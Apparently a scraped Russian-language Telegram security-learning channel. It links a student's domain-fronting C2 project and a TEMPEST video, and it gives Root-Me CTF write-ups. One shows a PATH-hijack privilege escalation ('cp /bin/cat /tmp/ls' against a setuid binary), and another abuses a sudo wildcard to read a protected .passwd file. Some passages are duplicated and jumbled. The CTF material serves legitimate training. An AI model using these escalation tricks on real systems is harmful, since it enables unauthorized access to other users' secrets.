https://github.com/mas0yama/bahnhofzooC2.T1090.004
В рамках курсача реализовал технику прикрытия доменом Domain Fronting
В рамках курсача реализовал технику прикрытия доменом Domain Fronting
GitHub
GitHub - mas0yama/bahnhofzooC2.T1090.004: C2 with basic domain fronting implemented.
C2 with basic domain fronting implemented. Contribute to mas0yama/bahnhofzooC2.T1090.004 development by creating an account on GitHub.
👍2
Итак! Начал ковырять SQL-инъекции на sql.training.hackerdom.ru.
По ходу дела райтапил то, что писал.
Илья Шапошников
Еще одна преза с конфы
По ходу дела райтапил то, что писал.
Илья Шапошников
Еще одна преза с конфы
🔥2
На лекции, посвященной побочным каналам связи, Пугачёв Илья Борисович рассказал про перехват ПЭМИН (побочных электромагнитных излучений) и последующие воспроизведение.
Вот пример, можно сразу на 03:00 промотать
https://www.youtube.com/watch?v=iSScvB4Rgj0
Вот пример, можно сразу на 03:00 промотать
https://www.youtube.com/watch?v=iSScvB4Rgj0
YouTube
💥 АМ ПЕРЕДАТЧИК из монитора ПК. Модулируем помехи. Tempest for Eliza - AM Radio Signal Transmitter
Программы, которые используют монитор вашего компьютера для отправки радиосигналов AM.
1) Tempest AM Radio Signal Transmitter (Передатчик радиосигналов Tempest AM): https://github.com/priikone/tempest-AM
2) Tempest for Eliza: http://www.erikyyy.de/tempest/…
1) Tempest AM Radio Signal Transmitter (Передатчик радиосигналов Tempest AM): https://github.com/priikone/tempest-AM
2) Tempest for Eliza: http://www.erikyyy.de/tempest/…
👍1
#pentest_kiddo
Real UID - the one who owns the process.
Effective UID - what the operating system looks at to make a decision whether smth is allowed to be done.
You can temporarily do it by setting the euid to the real user id and then changing the uid to anything you want.And later when you need the root privilege back you can setuid to root and the effective userid will change back to root. This is because the saved user id is not changed.
www.root-me.org/en/Challenges/App-Script/ELF32-System-1?lang=en
So, there is compiled .c file with the next source code.
So, we may try setting up an
An alias is a shell feature: any environment that invokes utilities directly, without involving a shell will not see aliases.
Note: Even when calling shell commands from languages such as Python (using, e.g., os.system()), user-specific shell initialization files are typically not called, so user-specific aliases still won't be visible.
A directory added to the $PATH environment variable is respected by any process that tries to invoke an executable by mere filename, whether via a shell or not.
Similarly, this assumes that any calling process sees the $PATH environment-variable additions of interest, so additions made by the user-specific initialization files are typically not seen, unless the calling process was launched from an interactive shell.
All in all, the solution is next:
Резюмирую, прав на перекомпиляцию кода не хватает, нужен обходной путь. Для этого мы меняем переменную окружения, добавляя в нее /tmp/ls , что есть /bin/cat
setreuid(), setregid(), seteuid(), geteuid().The matter is that there is different types of user ID (uid) in Linux.
Real UID - the one who owns the process.
Effective UID - what the operating system looks at to make a decision whether smth is allowed to be done.
You can temporarily do it by setting the euid to the real user id and then changing the uid to anything you want.And later when you need the root privilege back you can setuid to root and the effective userid will change back to root. This is because the saved user id is not changed.
www.root-me.org/en/Challenges/App-Script/ELF32-System-1?lang=en
So, there is compiled .c file with the next source code.
#include <stdlib.h>Obviously, we need to read .
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setreuid(geteuid(), geteuid());
system("ls /challenge/app-noscript/ch11/.passwd");
return 0;
}
passwd file, and there is no way to recompile this code.So, we may try setting up an
alias or editing the $PATH variable.An alias is a shell feature: any environment that invokes utilities directly, without involving a shell will not see aliases.
Note: Even when calling shell commands from languages such as Python (using, e.g., os.system()), user-specific shell initialization files are typically not called, so user-specific aliases still won't be visible.
A directory added to the $PATH environment variable is respected by any process that tries to invoke an executable by mere filename, whether via a shell or not.
Similarly, this assumes that any calling process sees the $PATH environment-variable additions of interest, so additions made by the user-specific initialization files are typically not seen, unless the calling process was launched from an interactive shell.
All in all, the solution is next:
cp /bin/cat /tmp/lsAnd then, run the binary.
export PATH = /tmp:$PATH
Резюмирую, прав на перекомпиляцию кода не хватает, нужен обходной путь. Для этого мы меняем переменную окружения, добавляя в нее /tmp/ls , что есть /bin/cat
www.root-me.org
Challenges/App - Script : Bash - System 1 [Root Me : Hacking and Information Security learning platform]
Bash - System 1 : Find your path, padawan!
🔥2❤1
#pentest_kiddo
https://www.root-me.org/en/Challenges/App-Script/sudo-weak-configuration
В вышеприложенном pdf-файле небольшой конспект куска доклада по sudo.
```
Let's try watching what commands are allowed for us to use.(pic1)
We need to read
From pic1 we can see that it's possible to run
Then we do next (pic3) and see the last line out of .passwd)
https://www.root-me.org/en/Challenges/App-Script/sudo-weak-configuration
В вышеприложенном pdf-файле небольшой конспект куска доклада по sudo.
```
-l, --list If no command is specified, list the allowed (and forbidden)```
commands for the invoking user (or the user specified by the
-U option) on the current host. A longer list format is used
if this option is specified multiple times and the security
policy supports a verbose output format.
If a command is specified and is permitted by the security
policy, the fully-qualified path to the command is displayed
along with any command line arguments. If a command is spec‐
ified but not allowed by the policy, sudo will exit with a
status value of 1.
Let's try watching what commands are allowed for us to use.(pic1)
We need to read
.passwd from ch1cracked (pic2)From pic1 we can see that it's possible to run
cat /challenge/app-noscript/notes/* as user app-noscript-ch1-cracked.Then we do next (pic3) and see the last line out of .passwd)
www.root-me.org
Challenges/App - Script : sudo - weak configuration [Root Me : Hacking and Information Security learning platform]
sudo - weak configuration : Privilege escalation
👍1
#linux_admin
После решенного выше таска, наверное очевидно, что разрешить конкретную команду пользователю != ограничить остальные аргументы.
После решенного выше таска, наверное очевидно, что разрешить конкретную команду пользователю != ограничить остальные аргументы.